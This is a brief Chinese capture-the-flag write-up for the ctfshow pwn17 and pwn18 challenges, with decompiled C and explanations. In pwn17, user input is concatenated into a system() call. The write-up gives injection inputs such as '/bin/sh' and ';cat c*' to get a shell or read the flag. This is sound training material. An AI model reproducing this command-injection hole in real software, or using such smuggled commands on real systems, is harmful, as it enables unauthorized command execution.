毛坯的人生和精装的朋友圈
pwn17
while ( 1 )
{
menu();
v4 = 0;
puts("\nEnter the command you want choose:(1.2.3.4 or 5)\n");
__isoc99_scanf("%d", &v4);
switch ( v4 )
{
case 1:
system("id");
break;
case 2:
puts("Which directory?('/','./' or the directiry you want?)");
read(0, buf, 0xAuLL);
strcat(dest, buf);
system(dest);
puts("Execution succeeded!");
break;
case 3:
sleep(1u);
puts("$cat /ctfshow_flag");
sleep(1u);
puts("ctfshow{");
sleep(2u);
puts("... ...");
sleep(3u);
puts("Your flag is ...");
sleep(5u);
puts("ctfshow{flag is not here!}");
sleep(0x14u);
puts("wtf?You haven't left yet?\nOk~ give you flag:\nflag is loading......");
sleep(0x1BF52u);
system("cat /ctfshow_flag");
break;
case 4:
sleep(2u);
puts("su: Authentication failure");
break;
case 5:
puts("See you!");
exit(-1);
default:
puts("command not found!");
break;
}
}当我们看到case3中的system("cat /ctfshow_flag");觉得稳了
但是前面的sleep(0x1BF52u)意思要等31个小时才能执行到这一步啊
所以我们看到了case2
case 2:
puts("Which directory?('/','./' or the directiry you want?)");
read(0, buf, 0xAuLL);// 通过read()函数从标准输入(stdin)中读取用户输入,并将其存储在名为“buf”的缓冲区中,并且限制了长度最多为0xA,即9strcat(dest, buf);//将用户输入的目录追加到名为“dest”的已有字符串后面
system(dest);
puts("Execution succeeded!");
break;
我们可以直接输入/bin/sh来取得shell,因为//bin/sh可以执行sh命令
也可以直接;cat c*
pwn18
main
puts("Which is the real flag?");
__isoc99_scanf("%d", &v4);
if ( v4 == 9 )
fake();
else
real();
system("cat /ctfshow_flag");
return 0;
}fack()
int fake()
{
return system("echo 'flag is here'>>/ctfshow_flag");
real()
int real()
{
return system("echo 'flag is here'>/ctfshow_flag");
}>>的意思是在/ctfshow_flag后追加flag is here
>是直接覆盖掉/ctfshow_flag的内容了
所以我们只需填9就可以了
